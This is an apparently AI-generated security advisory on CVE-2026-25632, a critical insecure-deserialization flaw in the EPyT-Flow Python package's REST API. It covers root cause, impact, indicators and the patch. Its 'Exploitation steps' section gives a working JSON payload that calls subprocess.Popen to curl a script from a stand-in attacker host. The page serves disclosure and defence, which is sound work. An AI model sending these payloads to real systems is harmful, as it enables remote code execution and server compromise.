CVE-2026-25632: 
Python vulnerability analysis and mitigation

Overview

CVE-2026-25632 is a critical unsafe JSON deserialization vulnerability in EPyT-Flow, a Python package for hydraulic and water quality scenario data generation for water distribution networks. The flaw exists in the custom my_load_from_json deserializer used by EPyT-Flow's REST API, which allows unauthenticated remote attackers to execute arbitrary OS commands. All versions prior to 0.16.1 are affected. The vulnerability was discovered by Jarrett Chan (@syphonetic), disclosed on February 4, 2026, and assigned a CVSS v3.1 base score of 10.0 (Critical) (Github Advisory, EPyT-Flow Advisory).

Technical details

The root cause is insecure deserialization (CWE-502) in the my_load_from_json function within epyt_flow/serialization.py. The custom JSON object_hook checks for a __type__ field in parsed JSON objects and, if present, uses importlib.import_module to dynamically import an attacker-specified module and class, then instantiates it with attacker-supplied keyword arguments — with no allowlist or validation. This enables an attacker to invoke any importable Python class, including subprocess.Popen, by sending a crafted JSON payload such as {"__type__": ["subprocess", "Popen"], "args": [["id"]]} to any REST API endpoint that parses JSON bodies, or by supplying a malicious JSON file. The patch (commit 3fff915) introduces a JSON_SERIALIZABLE allowlist populated only by classes decorated with @serializable, replacing the unrestricted importlib call (EPyT-Flow Commit, Github Advisory).

Impact

Successful exploitation grants an unauthenticated remote attacker full OS command execution on the server hosting EPyT-Flow's REST API, resulting in complete compromise of confidentiality (sensitive data theft), integrity (unauthorized file and system modification), and availability (service disruption or denial of service). Because the scope is marked as Changed in the CVSS scoring, the impact can extend beyond the EPyT-Flow process itself to other components on the same host. The vulnerability also affects offline JSON file loading, meaning even non-networked deployments are at risk if they process untrusted JSON files (Github Advisory, EPyT-Flow Advisory).

Exploitability

No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported as of the time of this report (Github Advisory). The vulnerability requires no authentication, no user interaction, and no special privileges — any network-accessible EPyT-Flow REST API instance running a version prior to 0.16.1 is directly exploitable. The EPSS score is approximately 0.096% (27th percentile), indicating a currently low but non-negligible probability of exploitation within 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, and no threat actor attribution has been identified (Github Advisory).

Exploitation steps

  1. Reconnaissance: Identify internet-facing or network-accessible EPyT-Flow REST API instances running versions prior to 0.16.1 using network scanning tools (e.g., Shodan, Censys, or nmap) targeting the default REST API port.
  2. Craft malicious JSON payload: Construct a JSON body containing the __type__ field specifying a dangerous Python class, such as subprocess.Popen, along with attacker-controlled arguments:
{
  "__type__": ["subprocess", "Popen"],
  "args": [["curl", "http://attacker.com/shell.sh", "-o", "/tmp/shell.sh"]]
}
  1. Send the payload: Submit the crafted JSON body via an HTTP POST request to any REST API endpoint that processes JSON input (e.g., scenario loading or configuration endpoints).
  2. Trigger deserialization: The my_load_from_json function's object_hook detects the __type__ field, dynamically imports subprocess.Popen via importlib, and instantiates it with the attacker-supplied arguments, executing the OS command during JSON parsing.
  3. Achieve code execution: The command runs in the context of the EPyT-Flow server process, enabling reverse shell establishment, data exfiltration, or further lateral movement within the host environment (EPyT-Flow Advisory, EPyT-Flow Commit).

Indicators of compromise

  • Network: Unexpected HTTP POST requests to EPyT-Flow REST API endpoints containing JSON bodies with __type__ fields referencing non-EPyT-Flow modules (e.g., subprocess, os, builtins); outbound connections from the EPyT-Flow server process to unknown external IPs.
  • Logs: REST API access logs showing requests with JSON payloads containing __type__ arrays referencing system-level Python modules; Python runtime errors or tracebacks related to importlib.import_module with unexpected module names.
  • Process: Unusual child processes spawned by the EPyT-Flow Python process (e.g., sh, bash, curl, wget, python3) that are not part of normal simulation workflows.
  • File System: Unexpected scripts, binaries, or web shells written to world-writable directories (e.g., /tmp/) by the EPyT-Flow service account; new cron jobs or scheduled tasks created under the service account.

Mitigation and workarounds

Upgrade EPyT-Flow to version 0.16.1 or later, which replaces the unsafe dynamic import mechanism with a strict allowlist (JSON_SERIALIZABLE) populated only by explicitly registered serializable classes (EPyT-Flow Release, EPyT-Flow Commit). For systems that cannot be patched immediately, the official workaround is to avoid loading JSON from untrusted sources and to not expose the REST API to untrusted networks (EPyT-Flow Advisory). Additional interim controls include restricting REST API access to trusted IP ranges via firewall rules, implementing network segmentation to isolate affected systems, and monitoring for JSON requests containing unexpected __type__ fields.

Community reactions

The vulnerability was covered by The Hacker Wire, which published an article titled "EPyT-Flow RCE via Insecure Deserialization" and shared it on Mastodon (The Hacker Wire). The CISA vulnerability bulletin for the week of February 2, 2026 referenced the CVE (CISA Bulletin). Community aggregators including Vulners, VulDB, and InfinitSec also indexed and discussed the vulnerability shortly after disclosure, reflecting moderate security community interest given the critical CVSS score.

Additional resources


Source: This report was generated using AI

Related Python vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

GHSA-v2f8-6655-7grjCRITICAL10
  • Python logoPython
  • vibe-trading-ai
NoYesOct 02, 2026
CVE-2026-105782HIGH7.5
  • Python logoPython
  • scrapy
NoYesOct 06, 2026
GHSA-v853-p72q-4cfwHIGH7.5
  • Python logoPython
  • quart
NoYesOct 05, 2026
CVE-2026-105751MEDIUM6.9
  • Python logoPython
  • docling
NoYesOct 05, 2026
CVE-2026-105750MEDIUM5.9
  • Python logoPython
  • docling
NoYesOct 05, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management